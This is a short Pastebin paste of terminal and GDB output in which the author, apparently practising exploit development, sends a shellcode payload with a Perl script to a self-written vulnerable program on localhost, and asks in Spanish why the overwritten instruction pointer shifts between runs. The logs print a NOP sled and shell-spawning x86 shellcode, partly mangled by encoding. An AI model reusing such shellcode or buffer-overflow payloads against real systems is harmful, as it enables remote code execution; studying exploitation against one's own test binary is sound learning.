Advertisement
b4nz0k

0000

Dec 27th, 2011
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.44 KB | None | 0 0
  1. r00t@r00t-NP123AA-ABM-p6100la ~ $ perl socks.pl 127.0.0.1 174
  2. Payload enviado exitosamente!
  3.  
  4. Conectado reverse_shell
  5. localhost [127.0.0.1] 5074 (?) : Connection refused
  6. sent 0, rcvd 0
  7. r00t@r00t-NP123AA-ABM-p6100la ~ $
  8.  
  9. ------------GDB1--------
  10. (gdb) r
  11. The program being debugged has been started already.
  12. Start it from the beginning? (y o n) y
  13. Starting program: /home/r00t/remvuln
  14. Conexion desde: -1208067920
  15. El cliente dice: << ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
  16. RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���
  17. AAAA
  18.  
  19. Program received signal SIGSEGV, Segmentation fault.
  20. 0x00114141 in ?? () from /lib/ld-linux.so.2
  21. (gdb) i r $ebp $eip
  22. ebp 0x414180cd 0x414180cd
  23. eip 0x114141 0x114141
  24.  
  25.  
  26.  
  27. ---------------------------------------------------------------------------------
  28.  
  29. r00t@r00t-NP123AA-ABM-p6100la ~ $ perl socks.pl 127.0.0.1 175
  30. Payload enviado exitosamente!
  31.  
  32. Conectado reverse_shell
  33. localhost [127.0.0.1] 5074 (?) : Connection refused
  34. sent 0, rcvd 0
  35.  
  36.  
  37. ----------------------------GDB2
  38.  
  39. (gdb) r
  40. The program being debugged has been started already.
  41. Start it from the beginning? (y o n) y
  42. Starting program: /home/r00t/remvuln
  43. Conexion desde: -1208067920
  44. El cliente dice: << �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
  45. RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���
  46. AAAA
  47.  
  48. Program received signal SIGSEGV, Segmentation fault.
  49. 0x00414141 in ?? <--DE DONDE .i.'s SALE EL 00?? ()
  50. (gdb) i r $ebp $eip
  51. ebp 0x4180cd0b 0x4180cd0b
  52. eip 0x414141 0x414141
  53. (gdb)
  54.  
  55. -------------------------------------------------------------------------------------------------
  56.  
  57.  
  58.  
  59. r00t@r00t-NP123AA-ABM-p6100la ~ $ perl socks.pl 127.0.0.1 176
  60. Payload enviado exitosamente!
  61.  
  62. Conectado reverse_shell
  63. localhost [127.0.0.1] 5074 (?) : Connection refused
  64. sent 0, rcvd 0
  65.  
  66.  
  67.  
  68. ------------------GDB3---------------------
  69.  
  70. (gdb) r
  71. The program being debugged has been started already.
  72. Start it from the beginning? (y o n) y
  73. Starting program: /home/r00t/remvuln
  74. Conexion desde: -1208067920
  75. El cliente dice: << ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
  76. RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���
  77. AAAA
  78.  
  79. Program received signal SIGSEGV, Segmentation fault.
  80. 0x0804868f in handle_reply <-- PORQUE SE CAMBIO TOTALMENTE?? ()
  81. (gdb) i r $ebp $eip
  82. ebp 0x80cd0bb0 0x80cd0bb0
  83. eip 0x804868f 0x804868f <handle_reply+59>
  84. (gdb)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement